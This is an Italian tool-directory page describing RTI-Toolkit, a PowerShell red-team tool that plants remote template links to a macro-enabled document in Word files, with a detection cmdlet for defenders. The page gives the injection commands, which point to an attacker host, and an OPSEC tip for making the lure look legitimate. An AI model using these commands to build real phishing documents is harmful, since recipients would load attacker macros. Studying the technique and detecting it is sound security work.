Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
RTI-Toolkit — PowerShell toolkit per attacchi e difesa di injection di template remoti. Inietta link dannosi in documenti Office Word per phishing, con moduli di identificazione per i blue team. | Kitploit
Strumenti/GitHubGitHub/nickvourd/rti-toolkit
Strumenti di PhishingPhishingPenetration TestingRed Teaming
GitHubnickvourd/rti-toolkit

RTI-Toolkit

PowerShell toolkit per attacchi e difesa di injection di template remoti. Inietta link dannosi in documenti Office Word per phishing, con moduli di identificazione per i blue team.

Vedi Repository
5592 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

RTI-Toolkit

Remote Template Injection Toolkit

Descrizione

RTI-Toolkit è un toolkit PowerShell open-source per l'attacco di Remote Template Injection. Questo toolkit include uno script PowerShell chiamato PS-Templator.ps1 che può essere utilizzato sia da un punto di vista offensivo che difensivo.

La tabella seguente presenta i moduli principali (cmdlet) di PS-Templator.ps1:

CmdletDescrizioneProspettiva
Invoke-TemplateImplementa collegamenti a modelli remoti all'interno dei modelli predefiniti di Office WordOffensiva
Invoke-RegularImplementa collegamenti a modelli remoti all'interno di documenti Office Word normali senza modelloOffensiva
Invoke-IdentifyIdentifica collegamenti a modelli remoti all'interno di documenti Office Word docx con/senza modelloDifensiva

⚠️ PS-Templator.ps1 supporta solo file DOCX.

ℹ️ Questo strumento è referenziato dal National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in CVE-2025-65318 e CVE-2025-65319.

Versione

1.0.0

Licenza

Questo strumento è concesso in licenza sotto License: MIT.

Ringraziamenti

Un ringraziamento speciale ai miei amici @Papadope9 e Stavros Gkounis (a.k.a purpl3ph03n1x), che hanno fornito un'assistenza preziosa durante la fase di beta testing dello strumento.

Questo strumento è stato ispirato durante un iCAST Red Teaming Assessment con @S1ckB0y1337 qualche anno fa.

Supernova è stato creato con ❤️ da @nickvourd.

Indice dei contenuti

  • RTI-Toolkit
    • Descrizione
    • Versione
    • Licenza
    • Ringraziamenti
    • Indice dei contenuti
    • Remote Template Injection (RTI)
    • Installazione
    • Cmdlet
      • Invoke-Template
        • Esempio Invoke-Template
      • Invoke-Regular
        • Esempio Invoke-Regular
        • Esempio Invoke-Regular 2
      • Invoke-Identify
        • Esempio Invoke-Identify
        • Esempio Invoke-Identify 2
    • Riferimenti

Remote Template Injection (RTI)

La Remote Template Injection (RTI) nel contesto di Microsoft Office si riferisce a un tipo specifico di vulnerabilità di sicurezza che può essere sfruttata tramite modelli dannosi nei documenti Office (es. Word, Excel, PowerPoint).

Ad esempio, in un file DOCX, il contenuto è memorizzato in formato XML all'interno dell'archivio, e alcuni di questi file XML possono fare riferimento a risorse o modelli esterni. Gli attaccanti possono infatti manipolare questi file XML per inserire collegamenti o contenuti dannosi che possono potenzialmente sfruttare vulnerabilità o ingannare gli utenti.

Questo è un attacco basato su Macro.

Installazione

Per caricare PS-Templator.ps1 come modulo in memoria, eseguire il seguente comando:

root@kitploit:~
Import-Module .\PS-Templator.ps1

ℹ️ PS-Templator.ps1 funziona senza la necessità di installare dipendenze aggiuntive.

ℹ️ PS-Templator.ps1 funziona come modulo PowerShell.

ℹ️ PS-Templator.ps1 testato su una macchina Windows 10 con Office 2019 Professional plus.

Cmdlet

Invoke-Template

Invoke-Template è un cmdlet che implementa collegamenti a modelli remoti all'interno dei modelli predefiniti di Office Word.

Esempio Invoke-Template

Supponendo di avere un modello Word predefinito, come questo:

All Words Templates

Salvato come, ad esempio, 'Name.docx':

Default Word Template Document

Se si utilizza il cmdlet Invoke-Template è possibile inserire un collegamento dannoso all'interno di questo docx:

⚠️ Prima di eseguire Invoke-Template, assicurati di salvare il documento e di chiuderlo (terminare il suo processo).

root@kitploit:~
Invoke-Template -InputDoc Name.docx -Link "https://192.168.1.3:8080/Doc1.docm" -Output C:\Users\User\Desktop\LegitDocument.docx

Risultato:

Invoke-Template-1

Come si può vedere, il modulo Invoke-Template mantiene un backup del documento originale e fornisce il percorso completo del documento dannoso.

Da un punto di vista di debugging, se si converte il docx dannoso in un archivio zip e si accede a /word/_rels/settings.xml.rels, è possibile vedere il collegamento dannoso:

Invoke-Template-Debug

Invoke-Regular

Invoke-Regular è un cmdlet che implementa collegamenti a modelli remoti all'interno di documenti Office Word normali senza modelli.

Esempio Invoke-Regular

Supponendo di avere un documento Word predefinito senza modello, come questo:

Blank Document

Salvato come, ad esempio, 'Doc1.docx':

Word Document

Se si utilizza il cmdlet Invoke-Regular è possibile inserire un collegamento dannoso all'interno di questo docx:

⚠️ Prima di eseguire Invoke-Regular, assicurati di salvare il documento e di chiuderlo (terminare il suo processo).

root@kitploit:~
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Nikos2.docx

Risultato:

Invoke-Regular-1

Come si può vedere, il modulo Invoke-Regular mantiene un backup del documento originale e fornisce il percorso completo del documento dannoso.

Da un punto di vista di debugging, se si converte il docx dannoso in un archivio zip e si accede a /word/_rels/settings.xml.rels, è possibile vedere il collegamento dannoso:

Invoke-Regular-Debug-1

Esempio Invoke-Regular 2

Da un punto di vista OPSEC, è possibile utilizzare -TemplateName insieme al modulo Invoke-Regular. Questo renderà il tuo documento dannoso più legittimo se qualcuno prova ad analizzarlo.

Ecco un esempio:

root@kitploit:~
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Legittemplate.dotx

Risultato:

Invoke-Regular-Example-2

Da un punto di vista di debugging, se si converte il docx dannoso in un archivio zip e si accede a /docProps/app.xml, è possibile vedere il nome del modello falso:

Invoke-Regular-Fake-Template-Name

Invoke-Identify

Invoke-identify è un cmdlet che identifica collegamenti a modelli remoti all'interno di documenti Office Word docx con/senza modello.

Esempio Invoke-Identify

Supponendo di avere un documento Word dannoso:

root@kitploit:~
Invoke-Identify -InputDoc LegitDocument.docx -Output C:\Users\User\Desktop\output.txt

Risultato:

Invoke-Identify Malicous Example

Esempio Invoke-Identify 2

Supponendo di avere un documento Word non dannoso:

root@kitploit:~
Invoke-Identify -InputDoc Name.docx -Output C:\Users\User\Desktop\output2.txt

Risultato:

Invoke-Identify Clean Example

Riferimenti

  • ired.team
  • dmcxblue.gitbook.io
  • john-woodman.com
  • remoteInjector GitHub by John Woodman
  • Invoke-Templator GitHub by Outflanknl
  • attack.mitre.org
  • BadAssMacros GitHub by Inf0secRabbit
Scarica lo strumento